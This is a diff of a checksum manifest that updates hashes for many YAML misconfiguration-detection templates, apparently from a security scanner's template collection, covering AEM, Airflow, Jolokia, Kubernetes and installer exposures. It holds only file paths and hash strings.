http/misconfiguration/aem/aem-explorer-nodetypes.yaml:7471d936350e616e9e7bbdafb846b5933cc72df6 http/misconfiguration/aem/aem-external-link-checker.yaml:2c8e53bcb1fbfc22302d0b7e0b983f01ca2e141e -http/misconfiguration/aem/aem-gql-servlet.yaml:74489b2377565751f987edfea65f06ebeb3e5ea5 -http/misconfiguration/aem/aem-groovyconsole.yaml:fb503b658a00d35b1b15b0a8cd41050a3d8761ba -http/misconfiguration/aem/aem-hash-querybuilder.yaml:b9da25f0fd6f314f42bb0574ed3a89ff1c6effda -http/misconfiguration/aem/aem-jcr-querybuilder.yaml:8f9a4891baad2cb55837ef7240815ff8ab870805 -http/misconfiguration/aem/aem-login-status.yaml:32697bc9b3a9b2f218fcd55f9f04a07e73c36d87 -http/misconfiguration/aem/aem-merge-metadata-servlet.yaml:fc4a7516528f9514961dcf7022359dcb5f65b8da +http/misconfiguration/aem/aem-gql-servlet.yaml:78e6be2ea486a9b41bf5e548905a2cf161f6d09f +http/misconfiguration/aem/aem-groovyconsole.yaml:a6fb745f754a0a65721c409a002595d100ba12fd +http/misconfiguration/aem/aem-hash-querybuilder.yaml:5e9e28f543609a9589635cb898def874dd3dfaf8 +http/misconfiguration/aem/aem-jcr-querybuilder.yaml:6dd0c6cfe7121fb342131f1e6d49881498a1efd7 +http/misconfiguration/aem/aem-login-status.yaml:c294ba77ff75f614c8bc65df05166a11dfed1525 +http/misconfiguration/aem/aem-merge-metadata-servlet.yaml:c5da80aff869e1b1580875fbaa66bd67c416d5cb http/misconfiguration/aem/aem-misc-admin.yaml:bad85db06f88211fc1328b63c319b8c173b46418 http/misconfiguration/aem/aem-offloading-browser.yaml:12050b612a42f523cfb4a6082e144baf3ee30397 http/misconfiguration/aem/aem-osgi-bundles.yaml:30b3d0776d31288ab39d8093cf742fa7bbebb1d2 -http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml:e9c2df506482002ad133e20e3f2ed1bbdd23e71f -http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml:1ca7988289273362625842141e097c5876061955 -http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml:e61facf99877385cb61fcb7b933e56b047e4e497 +http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml:1bfe9803461501e12fa6a8f03e4cd3fb733d721d +http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml:2e8f661e74ece987f8a4fb2daa99b8a814c3ef34 +http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml:0b898cc947638f4475f337d8b548931a5247b20a http/misconfiguration/aem/aem-secrets.yaml:033083bf6990af07870e13e0b1b79f08c1c04ff7 http/misconfiguration/aem/aem-security-users.yaml:7d1e1b509a43c14a29396333ac4af0e5d117bc1b -http/misconfiguration/aem/aem-setpreferences-xss.yaml:9db8ca17fe2be00d5f8063d046665ccf609e6e94 +http/misconfiguration/aem/aem-setpreferences-xss.yaml:8a88405c9aacffa782b3acaab4f21edb9c4b3b4f http/misconfiguration/aem/aem-sling-userinfo.yaml:e5934b740260d6d78dc98cf90a0f308bac69cc7b -http/misconfiguration/aem/aem-userinfo-servlet.yaml:f7c7cef0249c04c1102333c1f0e7211704fc2f9c -http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:891d506983fc0e9f2399b811f685cf09eb645d8a -http/misconfiguration/aem/aem-xss-childlist-selector.yaml:2a659cded900d5bb75b01f2b71f9bf824b02222b -http/misconfiguration/airflow/airflow-debug.yaml:73ecb206850cdff42956b7fb2e410aa405110df5 -http/misconfiguration/airflow/unauthenticated-airflow.yaml:c6f3ed35ccd4898737da5e4f35fecb836dd404a8 -http/misconfiguration/akamai/akamai-arl-xss.yaml:76466843457c1c864f583b33875620e9a0106038 -http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml:0bc9e0b6791382452bb5e7452d50a83709767476 -http/misconfiguration/alibaba-mongoshake-unauth.yaml:0c90ccc157483e024b366d1d3c0b9f9b03df19d7 +http/misconfiguration/aem/aem-userinfo-servlet.yaml:26af1f31bc2bd6f2c0143c12704cb5eb5a30517e +http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:c47109210b8e0ddeb25e51d2cb74878f0399d168 +http/misconfiguration/aem/aem-xss-childlist-selector.yaml:59bb24a67f48312e2a16fc8f9f0245297b4f190b +http/misconfiguration/airflow/airflow-debug.yaml:d27b2bfa9a7e5627dc370a58b3029abd022b1426 +http/misconfiguration/airflow/unauthenticated-airflow.yaml:71d0a8796187d81ce599235847b1407c8e22efab +http/misconfiguration/akamai/akamai-arl-xss.yaml:4cd3df9a592a9b6215784bb482b649dcb35ddefe +http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml:008e85eb5567d1379749d515dbd8425a1a10c054 +http/misconfiguration/alibaba-mongoshake-unauth.yaml:9443c71a6a31261b0f2c48411afbd33b9d55f793 http/misconfiguration/ampache-update-exposure.yaml:d93e7134fd67d9baca3f51fd61bd4e3cdafccde5 http/misconfiguration/ampps-dirlisting.yaml:982e53209ce4dee232ae334802e91796fa74772d -http/misconfiguration/android-debug-database-exposed.yaml:73a7ac140bebb31fff693ea3bc512ba1b614ef6c +http/misconfiguration/android-debug-database-exposed.yaml:c6e2660f8da2b895ce695e0482f6c36ceca8ca61 http/misconfiguration/apache/apache-filename-enum.yaml:85a6708476a1ce4dae2fbb03fcb70fe82a756b36 http/misconfiguration/apache/apache-hbase-unauth.yaml:9b423614dad084bca22878d48987c6355e749293 http/misconfiguration/apache/apache-nifi-unauth.yaml:c4b5d125120c2b1614e78b978cf1e8638ccdb75b http/misconfiguration/apache/apache-storm-unauth.yaml:ec48391d69726d11a50250d901a5f6ca1568fd66 http/misconfiguration/apache/apache-zeppelin-unauth.yaml:2a441f5be73b1674fec1a40096ebdb0dcb115e10 http/misconfiguration/apache/kafka-manager-unauth.yaml:4164e70b56cc9063edd555b9331ac3bb12aa7f05 -http/misconfiguration/apache/tomcat-pathnormalization.yaml:aded04d307fd62037d53fe11d1610cb3f3ea6c46 +http/misconfiguration/apache/tomcat-pathnormalization.yaml:bad091d1ac53098e32318132df2fa339c90e6dcf http/misconfiguration/apache-drill-exposure.yaml:792715f62979f623e4e1d8cd0ed034ff2eb01afc http/misconfiguration/apache-druid-unauth.yaml:f733c030df890a6861a1ae3660266e07c762298e http/misconfiguration/apache-impala.yaml:8d74afa76cb797f3a7bf3c986631d7e93bd3487b http/misconfiguration/apache-struts-showcase.yaml:088299aab3e71e7e4f0873ba52b72e9f69ad1f3f -http/misconfiguration/apc-info.yaml:2862c2dd33ec7fc5342f56dd75ed482e68a4302f +http/misconfiguration/apc-info.yaml:04f449c83fb52acaeab43dcc66873ea7e2292da8 http/misconfiguration/apollo-adminservice-unauth.yaml:e78257a11db860ac6a1d34df3f41fed2d99cbd45 http/misconfiguration/application-yaml.yaml:37fec8f5574c0f3cee8b63b9fcf3db093ab3fefb -http/misconfiguration/artifactory-anonymous-deploy.yaml:93f62d1f62bb2f2e4939f3fc8a089289b81827d7 -http/misconfiguration/aspx-debug-mode.yaml:0a6e3fe30d7e5c439b7a854541bb7502a7f56733 +http/misconfiguration/artifactory-anonymous-deploy.yaml:c4dbfa15ffe5523db87a67e086baf8be240665df +http/misconfiguration/aspx-debug-mode.yaml:d5a4bfbbb08e3ccd88ff9ef4cb7fb784e4e79684 http/misconfiguration/atlassian-bamboo-build.yaml:71cb19c46cafbebd7533e98b88d45227731727eb http/misconfiguration/aws-ec2-status.yaml:f52f9d1feaf736a3728ae0c95d266d575fad9b77 http/misconfiguration/aws-object-listing.yaml:56e839cf2c6295357e747db2028d4a28a84f60f0 -http/misconfiguration/aws-redirect.yaml:bfde256899ae55a362ca03c48eea09bf061996b3 +http/misconfiguration/aws-redirect.yaml:4ed240934eb9c67becc2ab090ce768f9c05376c9 http/misconfiguration/aws-s3-explorer.yaml:d469f865c937b7091ea892357924bd18a112c1ae http/misconfiguration/aws-xray-application.yaml:d2e6d1d3565995c552f043c019de44a454e920ae http/misconfiguration/awstats-listing.yaml:cefec72eb3bf609f09779109eef39dfa9e62795b http/misconfiguration/bitbucket-public-repository.yaml:3ae328db3b76977394dca6df4b06d9d1a2402223 -http/misconfiguration/blackbox-exporter-metrics.yaml:1b007870d9cc2e5889ed9f24499dc5a65b0b7f6d +http/misconfiguration/blackbox-exporter-metrics.yaml:23bbd2929451b68aa7b0059bd18ba51643a41285 http/misconfiguration/bootstrap-admin-panel-template.yaml:e0a8f253df0d0977c3445b31f8e5c30c7d98e94b http/misconfiguration/bravia-signage.yaml:112b33d9332d3e80f0871c37adf7f3736d986d0f -http/misconfiguration/browserless-debugger.yaml:d604fd376e91cd89e1dddc043a808cbb5cbc6983 +http/misconfiguration/browserless-debugger.yaml:a3a45ae884e34deb54c96476f31141b5338cd4f8 http/misconfiguration/cadvisor-exposure.yaml:b474265e13c72987988f727798d64cfcdd02494c -http/misconfiguration/cgi-test-page.yaml:ca7f843fe1d569a61743f154508f03aed7acddf5 -http/misconfiguration/clockwork-dashboard-exposure.yaml:a6f1daed673e5f6694e6dc5938ca5df5d8ccb394 +http/misconfiguration/cgi-test-page.yaml:a4912db83100bdde0dd7e52454da25c7c716dbb3 +http/misconfiguration/clockwork-dashboard-exposure.yaml:e05c36e876b9bd13b7f444195bcd02e83068a3d0 http/misconfiguration/cloud-metadata.yaml:8778d2ecf82407b77b95a567d76fbd40a8d11e94 http/misconfiguration/cloudflare-image-ssrf.yaml:5cde64e35a786a2fed9498626ebaaea5429f7997 -http/misconfiguration/cluster-panel.yaml:e53352d353b191f9b61b613fcc89e971284d03fb +http/misconfiguration/cluster-panel.yaml:5b087699abd5bf6c98480f9c36b9896c20c83e24 http/misconfiguration/cobbler-exposed-directory.yaml:b4ff1d7d46d661f7e27d23879280633028c1dd3d http/misconfiguration/codeigniter-errorpage.yaml:97f2f5b97183a0fc700e723bdac5f59f4d184055 http/misconfiguration/codemeter-webadmin.yaml:3ad9e6225800a6a4213d5deaab056aec3df3a4f4 http/misconfiguration/codis-dashboard.yaml:7bf49a01e5f1776e0d0e1153a56a61b3960d508a -http/misconfiguration/collectd-exporter-metrics.yaml:54946544cad933293c860c88a6178f1af904651b -http/misconfiguration/command-api-explorer.yaml:3c20d4fc27d4db820753d88d124f2132f3b49212 +http/misconfiguration/collectd-exporter-metrics.yaml:a2575837ed3981258169c7797e69b036f716cc61 +http/misconfiguration/command-api-explorer.yaml:2c5cc02b27bed87f7c37d8d2c9d3a1fcf7b667bc http/misconfiguration/confluence/confluence-oauth-admin.yaml:740fe13817c58676841d182ad4aabd76493786e6 http/misconfiguration/confluence-dashboard.yaml:e853ef299dc09722905bec740eb0710b7d808dac http/misconfiguration/corebos-htaccess.yaml:6b6045e93706ed3c1e294f71208a9681c999e9d3 -http/misconfiguration/cx-cloud-upload-detect.yaml:227da1784a12fe8614815f94993b6c74aaad5d76 -http/misconfiguration/d-link-arbitary-fileread.yaml:b25d4c5b9f8a38933225c1d9dcdfec8d10704e9c +http/misconfiguration/cx-cloud-upload-detect.yaml:ebf9a69f779537d15193a3e0f99993dc32909f7d +http/misconfiguration/d-link-arbitary-fileread.yaml:645e9481cbe2312c1e131b0550ba4a6681400371 http/misconfiguration/database-error.yaml:550eeb12f2bd5b99a600e04ff12de1357ccdb6c1 http/misconfiguration/debug/ampache-debug.yaml:f821e8ca3af7b0fda21962a838544e77870f88b4 -http/misconfiguration/debug/bottle-debug.yaml:b6392acf9da817a2bef4a12803d622917cc81772 -http/misconfiguration/debug/flask-werkzeug-debug.yaml:175e2bd8f7f2ab34d9ecb413beb252655d9a3ef3 +http/misconfiguration/debug/bottle-debug.yaml:b8efae2083f412d6bebab2de14f26fcf932f5641 +http/misconfiguration/debug/flask-werkzeug-debug.yaml:a3dce5e0ef737aca35ccd245baba02cee966eff6 http/misconfiguration/debug/github-debug.yaml:ecf98218fcacdac655b557121fcf3715e4bb8159 http/misconfiguration/default-spx-key.yaml:b8815c33c65aa92ff896625d5fa8a322296205e6 -http/misconfiguration/deos-openview-admin.yaml:1e807c09de91e0273bd21f530149a2b238c6cf7a -http/misconfiguration/dgraph-dashboard-exposure.yaml:cef311f038bfb10dce20b822ce2d604be1a5b04e -http/misconfiguration/django-debug-detect.yaml:02b3b7097316015f7437c6ec2688b9716681083a +http/misconfiguration/deos-openview-admin.yaml:cb455fcd16c850e2b1c940f219de28be818852d7 +http/misconfiguration/dgraph-dashboard-exposure.yaml:21d37e015cbf046ed2ace3d9c3e980364bad8cc1 +http/misconfiguration/django-debug-detect.yaml:e95386d63f75c688974f558c12b9c88e7e2f3b32 http/misconfiguration/docker-registry.yaml:3e6795cfc6060e9f44d0983e4ab4b91708211b07 http/misconfiguration/docmosis-tornado-server.yaml:de29fa477373aa022f20a04fa9ac1f247979e2e5 -http/misconfiguration/druid-monitor.yaml:0f001da6c20012aff46b1537323696d5e1a41e28 -http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:fe083bb982103879c62938629378e41a704fe657 +http/misconfiguration/druid-monitor.yaml:e500677a28efb6d0ebc777abd4e956886c08e515 +http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:3dcc0418097a253a9f8b6e80bd4c32a1acf911c9 http/misconfiguration/drupal/drupal-user-enum-redirect.yaml:71c8edfca37ff548899ac75de2fae1f02b768a01 -http/misconfiguration/dynamic-container-host.yaml:381d4e6ece0fa9bdf13b30f72155be88d25b3b79 +http/misconfiguration/dynamic-container-host.yaml:8e3f4990d7239ef14b1fec4ec2af9b33236d6a4e http/misconfiguration/ec2-instance-information.yaml:6293ca79638118a5c045fd01b5c3bcd9e5523ee3 http/misconfiguration/elastic-hd-dashboard.yaml:c6255bd33a31115ce354696c6602a8095b6159e4 -http/misconfiguration/elasticsearch.yaml:7ecd73220a854d101ba4b2d38c0e18f871c55646 +http/misconfiguration/elasticsearch.yaml:cd15f2d154ebdb121f42308ed560d3f11e4ba02a http/misconfiguration/encompass-cm1-homepage.yaml:4e110a936d0c8ab5b433fdee7f01f04f70440d1d http/misconfiguration/envoy-admin-exposure.yaml:62aca142bd81e2a80209de0df51138a6d8444ed5 http/misconfiguration/espeasy-mega-exposure.yaml:b55e697e0bdd7705ace1a06db669b61bef32c15f http/misconfiguration/esphome-dashboard.yaml:f2be2bbc61c076b33b70e16477443a6ea90f213a http/misconfiguration/etcd-unauthenticated-api.yaml:91d4808cda8443ed1cd7e8934448d3bd65d23b58 -http/misconfiguration/everything-listing.yaml:5c4f7bf596c9b66f108c21db966d820b9e21f2e2 -http/misconfiguration/exposed-docker-api.yaml:2a3640c51af6d912485825e08f9a7121819f5458 -http/misconfiguration/exposed-jquery-file-upload.yaml:105bc70676618bfce0d8faef8df1157374d2d40d +http/misconfiguration/everything-listing.yaml:ac3d1e9f17af9dc98f82ef9462d565e427870eee +http/misconfiguration/exposed-docker-api.yaml:1bdaabbd85e76690255a305ac6442b16e537d7b7 +http/misconfiguration/exposed-jquery-file-upload.yaml:b02ab6d6d2516638e484ed8ce5376c975ff75dab http/misconfiguration/exposed-kafdrop.yaml:2d98c9a998fbf41f40b2926cbf67e9e29ad57ce6 -http/misconfiguration/exposed-kibana.yaml:6ee98c4f4f81145e510b0c1df9ae407cd20203e6 +http/misconfiguration/exposed-kibana.yaml:6528f0e7babf81b8f71798dadea5150119784900 http/misconfiguration/exposed-service-now.yaml:911c997fbb6a866aa14121d349630170a3baa509 http/misconfiguration/exposed-sqlite-manager.yaml:7403a0849ca8cea0dcf63e664e0f574c9104c4a8 http/misconfiguration/express-stack-trace.yaml:f87f460eb04297d0ecc7e6fd0ee04502880e6064 @@ -3955,7 +3955,7 @@ http/misconfiguration/formalms-install.yaml:3146478146f106551371ec66ec86e7ad3c30 http/misconfiguration/front-page-misconfig.yaml:7baa1afa482ebcacffaed682c39ecfbb91cbf6fd http/misconfiguration/ganglia-cluster-dashboard.yaml:a065363e9259aab0d49bddb760688cfda669b9a7 http/misconfiguration/genieacs-default-jwt.yaml:8bd6683d4adc6ee59444e52314b1b04c382750f0 -http/misconfiguration/git-web-interface.yaml:f0b4732a2bfa25ca494e66c98a19dabdb5cd8bbb +http/misconfiguration/git-web-interface.yaml:1415ab5a2d5a170516d1c155317e33b6ec77dca0 http/misconfiguration/gitea-public-signup.yaml:c076527b0e1e9496ade22db8a21ba4374545a0f3 http/misconfiguration/gitlab/gitlab-api-user-enum.yaml:a13fe47ff257f28efd52db5f61032de455fcb8f2 http/misconfiguration/gitlab/gitlab-public-repos.yaml:b65c56ae71c3d920517861463164025df2838c7e @@ -3971,35 +3971,35 @@ http/misconfiguration/gocd/gocd-encryption-key.yaml:1da3c9a20517a4ad0637d316b73b http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:da1a707bedef3b071d997f46bd9f110a3b563212 http/misconfiguration/google/insecure-firebase-database.yaml:d1b7576ba8cb088abf66adc99d2a4add5b0c1801 http/misconfiguration/gopher-server.yaml:351b05fde081a9ff54973abdf94d8410b23b68cc -http/misconfiguration/grafana-public-signup.yaml:54130d5dc48440e43f62a8531d5356bd235878cf -http/misconfiguration/graphql/graphql-alias-batching.yaml:4aeddcefb2741725c3dfcb58b712e9e2732d484c -http/misconfiguration/graphql/graphql-array-batching.yaml:f8195b045be9e30fa9215b4a1bb3901fdb29236c -http/misconfiguration/graphql/graphql-field-suggestion.yaml:774a6f99933e22ea8e3c0a6987748d32162d71db -http/misconfiguration/graphql/graphql-get-method.yaml:b2f6cd219ca2117a2fab9a9145c488b89a600acf +http/misconfiguration/grafana-public-signup.yaml:49a0957324a7cac39e938dc88e63f009edaacc7e +http/misconfiguration/graphql/graphql-alias-batching.yaml:5f8bb841b70691417b1542277b974f1b3f8dbc84 +http/misconfiguration/graphql/graphql-array-batching.yaml:b1c6fd3ee043784d647005b6407ab81ef176501f +http/misconfiguration/graphql/graphql-field-suggestion.yaml:0fc72f273bda769a74fa42725f9396f5aee937cc +http/misconfiguration/graphql/graphql-get-method.yaml:16a190b2aa57a7745814b4f8cb7d86e83475bb35 http/misconfiguration/graphql/graphql-playground.yaml:791736c821562ea09fef7b49bd146de709c47ec1 -http/misconfiguration/grav-register-admin.yaml:8a5655b418498523e10656cabb527ab75b00d6a7 -http/misconfiguration/hadoop-unauth-rce.yaml:3d39991821296cf7d1aba075286ee111f25991b2 -http/misconfiguration/haproxy-exporter-metrics.yaml:bed30cee7f8cfa31c5896170da6c1c55dc64ae2e -http/misconfiguration/haproxy-status.yaml:e64b16ad4d2303dccf83416862651941caeaea72 +http/misconfiguration/grav-register-admin.yaml:0fb74fd43e0989fe5d44de307953cc971cf557f9 +http/misconfiguration/hadoop-unauth-rce.yaml:d2f06bc5dcdfa0c5c407f992de413793b04190e1 +http/misconfiguration/haproxy-exporter-metrics.yaml:ebbcace5d5db08606a496ca438e4e6cce7a0fdcb +http/misconfiguration/haproxy-status.yaml:edbb1bd2b858fb255495420b5c3aa5ce8725a749 http/misconfiguration/healthchecks-ui-exposure.yaml:3018bee44918e5ef5e55a6902b43969486701fa4 http/misconfiguration/hfs-exposure.yaml:68b2179c49b5a3051cb58742869803f0a521c385 http/misconfiguration/hivequeue-agent.yaml:a444969d972e8def5e7eb4061b39fdc04c552ea4 -http/misconfiguration/hp/unauthorized-hp-printer.yaml:dbab24fce13d0f5cbb4d16a788ab39f4fe950444 -http/misconfiguration/hp/unauthorized-printer-hp.yaml:d372cb189471e659b11acf0fd474d3968077f094 -http/misconfiguration/hpe-system-management-anonymous.yaml:65d4cb03ab85f37ac509567200ce902cfd566963 +http/misconfiguration/hp/unauthorized-hp-printer.yaml:8e0934c75326956db1fa9069b4615edfcb10aa29 +http/misconfiguration/hp/unauthorized-printer-hp.yaml:6c589d47eef228d0d4ce66bbd6884f57edbf5344 +http/misconfiguration/hpe-system-management-anonymous.yaml:b1c4d0729104d5b38306739f23db65280361b56f http/misconfiguration/http-missing-security-headers.yaml:a6d752806c774d36b6fb5fdd9d5fded9f764f8b7 http/misconfiguration/httponly-cookie-detect.yaml:c64d772ea2b1baebf90eb45d17b948946ab4e601 -http/misconfiguration/ibm-friendly-path-exposure.yaml:4a0c016c96752c544532427f11a18deb106111a3 -http/misconfiguration/ibm-websphere-xml.yaml:b2d99fde3c919e278194f8824c900fb1038b67ea +http/misconfiguration/ibm-friendly-path-exposure.yaml:02e17960b936d9497f8673629bf5c75000e1f633 +http/misconfiguration/ibm-websphere-xml.yaml:8b457d337cb671b938b8dee1743b2ba009689b7b http/misconfiguration/iis-internal-ip-disclosure.yaml:bd8ba07fe291bb84914ed2b33c03bc195399daed http/misconfiguration/installer/acunetix-360-installer.yaml:08978fd91dcf0249d0d50ec692ea165e73a1342d http/misconfiguration/installer/ampache-music-installer.yaml:28e4b0bedc08cbf5210559e43f440e444ad35820 http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml:46a5c397b2f9d57c2d7a7b8f2e3423835cc75d80 -http/misconfiguration/installer/avideo-install.yaml:aa78338e173237cd8412282ca9c1ec7eeb9acdf8 +http/misconfiguration/installer/avideo-install.yaml:f5a5b98e16e8c3b61022917d114c9584854738bc http/misconfiguration/installer/bagisto-installer.yaml:f33130e67be12f52d3e719eba69c9bcf02cf8b19 http/misconfiguration/installer/binom-installer.yaml:5a0bda002247c3c4f299124b776e7de31d4ff5ca http/misconfiguration/installer/blesta-installer.yaml:9bb3ce964212c9aeae365fe58ca43104b3ee2006 -http/misconfiguration/installer/circarlife-setup.yaml:595620cb68530c3e2c8c1b72e8f8b1e2f0083c47 +http/misconfiguration/installer/circarlife-setup.yaml:76568de85707d9df196dd07cd21a3f64d2827cc2 http/misconfiguration/installer/cloudcenter-Installer.yaml:d0a27daa30662ca704278975f2d42cb0674fe479 http/misconfiguration/installer/codeigniter-installer.yaml:b6bb44771d370c762ee7949160cad9898b995fb3 http/misconfiguration/installer/concrete-installer.yaml:1473d93c26ed6990dfefc20fe4556dea7449d8e1 @@ -4012,7 +4012,7 @@ http/misconfiguration/installer/eshop-installer.yaml:9a4171cee310d35fb79c45e5914 http/misconfiguration/installer/espeasy-installer.yaml:a5b7bca27435a71326f650190739c4c5e6dea4ef http/misconfiguration/installer/facturascripts-installer.yaml:02d94e59d0f49194d545a53396f455945760f85e http/misconfiguration/installer/geniusocean-installer.yaml:5c41a8624d2daf80af4cbdd2fe84f69c05b42c7c -http/misconfiguration/installer/getsimple-installation.yaml:47c683728da500f536d82a1d05ba2689c4a3f2dc +http/misconfiguration/installer/getsimple-installation.yaml:4632bbae55daeb2c0ca75e3348de9af1525da319 http/misconfiguration/installer/gitea-installer.yaml:30a0dc762499cbfb1c8ac2d1b3dfeb0148a619e5 http/misconfiguration/installer/gogs-installer.yaml:e4b17e837c63e9fc4d08c858d653c60d6aabf2c3 http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2502bd4a40039ff5c1991 @@ -4023,10 +4023,10 @@ http/misconfiguration/installer/limesurvey-installer.yaml:54fa5e339c11fa21e16c99 http/misconfiguration/installer/lmszai-installer.yaml:bd5e1d6df6913b83a85555d8015ece59b19bf27a http/misconfiguration/installer/lychee-installer.yaml:54b1ca8400339d8ce3442109dea8356a809288a2 http/misconfiguration/installer/magento-installer.yaml:c6e440e4873876f64c732177fcf84521d8677926 -http/misconfiguration/installer/magnolia-installer.yaml:5dac5126d20064986e1b325942fea208a897bdd8 +http/misconfiguration/installer/magnolia-installer.yaml:6a646973b2b9be72f9eea240e61473bc76657138 http/misconfiguration/installer/matomo-installer.yaml:11b8fc5a1e88dd75aedcacd4d062f84ec57b533d http/misconfiguration/installer/mautic-installer.yaml:27560145f4bac624acc11e51ab63162348de5beb -http/misconfiguration/installer/mcloud-installer.yaml:0eb7861b9517b7c910d2cdfdca97ddf3612a77a3 +http/misconfiguration/installer/mcloud-installer.yaml:2655d701537e75cf825d0c2b18e2cb310964be44 http/misconfiguration/installer/metaview-explorer-installer.yaml:89277e9c20f8bfb7f2a5241bd16d8bdb80ad3443 http/misconfiguration/installer/monstra-installer.yaml:0ad9a2c754cec2d81681033d85e96c1c6a3cbb66 http/misconfiguration/installer/moodle-installer.yaml:ccbd571474cf9ee865838ffca86697ba5fce3e4a @@ -4036,7 +4036,7 @@ http/misconfiguration/installer/nginx-auto-installer.yaml:a45c4bc03311eb33170957 http/misconfiguration/installer/nodebb-installer.yaml:7a5df25da7163e43f58532154f602652d0b013cc http/misconfiguration/installer/nopcommerce-installer.yaml:175c8c9d4976771f3e860bae45615c35841b7ee2 http/misconfiguration/installer/openmage-install.yaml:4aa42695d5062c627d4290348a5459f57ecf5a14 -http/misconfiguration/installer/openshift-installer-panel.yaml:348f4bb66e54d842ff188a610e5a9d68bf617e21 +http/misconfiguration/installer/openshift-installer-panel.yaml:89b40fe722408c5942f57c4da57704f0df8964eb http/misconfiguration/installer/opensis-installer.yaml:b2b80ff3af51a7ccc9f2f70da8853f4a4ac0b85a http/misconfiguration/installer/orangehrm-installer.yaml:574bc86b3623ef066660207d8242072b670ebcfd http/misconfiguration/installer/owncloud-installer-exposure.yaml:fcbb996a97f967b3212e064267d1a64eb724d2fd @@ -4054,7 +4054,7 @@ http/misconfiguration/installer/server-monitor-installer.yaml:b76832516a1fddb310 http/misconfiguration/installer/shopify-app-installer.yaml:0fd1dfe851c0fe1a077960bff792431845ac2d6d http/misconfiguration/installer/smf-installer.yaml:17fb2697893767a0fd0185367fa9d46b20ab1f0f http/misconfiguration/installer/sms-installer.yaml:9f0f50c973150c05748646e0aa126699737d4143 -http/misconfiguration/installer/spip-install.yaml:9b3f0a7183cd6165a6878c931e175be44188007c +http/misconfiguration/installer/spip-install.yaml:0738036665e50e622dd59dfcd1633fdae56e4bce http/misconfiguration/installer/suitecrm-installer.yaml:cd83c905b266af72a7de369f39cf1a8d35f15555 http/misconfiguration/installer/sumowebtools-installer.yaml:80de795776d6c5db88e0cdeaf7bde126d00db98a http/misconfiguration/installer/tasmota-install.yaml:1fa030bacda853a852a5737e603cc70522e27c51 @@ -4068,88 +4068,88 @@ http/misconfiguration/installer/uvdesk-install.yaml:320a11b9cea52323a096a72743f4 http/misconfiguration/installer/vtiger-installer.yaml:076b0cac3812089d8b473161c128f1a51a850e4f http/misconfiguration/installer/webasyst-installer.yaml:45036a303e7bd289c6dee8ee6ccbaafcc78a9e1a http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756dbde108aeb4927 -http/misconfiguration/installer/wp-install.yaml:ea9ba75741b72152f31680e16dfbdaae3c1012af +http/misconfiguration/installer/wp-install.yaml:cceeec383507590bd019c5f9da6de77c725afda2 http/misconfiguration/installer/zenphoto-setup.yaml:77adefadea89cca423b2f375b41eaf99f8e0ea86 http/misconfiguration/iot-vdme-simulator.yaml:6769c64d1927c4686a8b6c1235c6ce48e5ffbd93 http/misconfiguration/jaeger-ui-dashboard.yaml:efec14b7239b7f4eff7378c2952dba84a6e9e112 -http/misconfiguration/java-melody-exposed.yaml:b60c1fcaea251d9571ad67d653137cbdcdafc5f3 -http/misconfiguration/jboss-status.yaml:8c815279d70694599f03ed420f7a54230af0e920 +http/misconfiguration/java-melody-exposed.yaml:33c8f43e9c353a14664f069856e87c5b82174552 +http/misconfiguration/jboss-status.yaml:75178b77cb67eaa314f18aa527d2d2fd65a5d0d7 http/misconfiguration/jboss-web-service.yaml:d231a296121beabbf9dbde3e5be75d3b574b2092 http/misconfiguration/jenkins/jenkins-openuser-register.yaml:ec2082d6058f4ece4d1ae40dede0ada1072ecb9c http/misconfiguration/jetty-showcontexts-enable.yaml:188720b15a7b5d97cf4ac43c613d830916cc7521 -http/misconfiguration/jolokia/jolokia-info-disclosure.yaml:aed816f1136f44813a7313d99f07aa964f09a72d -http/misconfiguration/jolokia/jolokia-list.yaml:6374c8133a97551af6a9180f3e912f5000502939 -http/misconfiguration/jolokia/jolokia-mbean-search.yaml:c266bca56fdc6169e0d5a1ea458eae322f16fe4d -http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml:6300baf00a00e612be1bbc5dffa995023ce3ea62 -http/misconfiguration/jupyter-ipython-unauth.yaml:6f8dbacf90cc4884378d7a79e696711f39b64e09 +http/misconfiguration/jolokia/jolokia-info-disclosure.yaml:690540e59f5e146d370c0b473dcc9214fe4fdf8f +http/misconfiguration/jolokia/jolokia-list.yaml:fe9429754e230c618c19f4adc23cad813f866828 +http/misconfiguration/jolokia/jolokia-mbean-search.yaml:81276563cebea7f79f17fa1dc805b497653d31e2 +http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml:d9c27cc81efbcecac519b76ade043541fa408e10 +http/misconfiguration/jupyter-ipython-unauth.yaml:7efba6cf53e509d4cf51b5b90ad43b61d8183a6e http/misconfiguration/jupyter-lab-unauth.yaml:b550a9f5357574509564c0e86ccc938f7a06c508 http/misconfiguration/jupyter-notebooks-exposed.yaml:aa2e7822ab7f97dae8e3e6a6d99227b143e58c6a http/misconfiguration/kafka-cruise-control.yaml:fdfc82fa91518cbf7f33b126a2467d9e7888c36a -http/misconfiguration/kubeflow-dashboard-unauth.yaml:b588f26c0ed0006cc2ec80cd9a0fd8cef366dbe4 +http/misconfiguration/kubeflow-dashboard-unauth.yaml:4f32a4b55ac722a5fdfb3b053e7e0abd29f26fbd http/misconfiguration/kubernetes/kube-state-metrics.yaml:c979e984cd5bfc6b3fc6887230c34cbc6b6af304 -http/misconfiguration/kubernetes/kubernetes-metrics.yaml:f96a4bf15df1ff57ae812c2a3d9660b84516e908 -http/misconfiguration/kubernetes/kubernetes-pods.yaml:09bdbcfb2fb3ae5894203940a9ddd6211c91d617 -http/misconfiguration/kubernetes/kubernetes-resource-report.yaml:836f4207ec2f160a693f12ba6210860a37e6d4dc 